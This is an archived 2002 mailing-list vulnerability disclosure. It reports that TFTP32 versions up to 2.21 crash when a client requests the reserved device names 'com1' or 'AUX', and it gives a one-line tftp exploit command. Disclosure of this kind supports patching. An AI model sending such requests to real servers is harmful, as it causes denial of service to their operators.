TFTP32 DOS

From: securma massine (securmaat_private)
Date: Tue Dec 10 2002 - 12:45:36 PST

Next message: Mandrake Linux Security Team: "MDKSA-2002:082-1 - Updated python packages fix local arbitrary code execution vulnerability"

Previous message: Kurt Seifried: "Re: [VulnWatch] proftpd <=1.2.7rc3 DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

hi
tftp32 is a server for Windows 9x/NT/XP 
(http://tftpd32.jounin.net)
I found that one could crash th server with "GET com1" 
or "GET AUX"
exploit: 
 tftp -i xxx.xxx.xxx.xxx GET com1 
the waiter must be restarted manually
version affected: TFTP32 version 2.21 and prior

NO affected: TFTP32 v2.51

securma massine

_________________________________________________________ 
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)

Next message: Mandrake Linux Security Team: "MDKSA-2002:082-1 - Updated python packages fix local arbitrary code execution vulnerability"
Previous message: Kurt Seifried: "Re: [VulnWatch] proftpd <=1.2.7rc3 DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Dec 10 2002 - 12:45:36 PST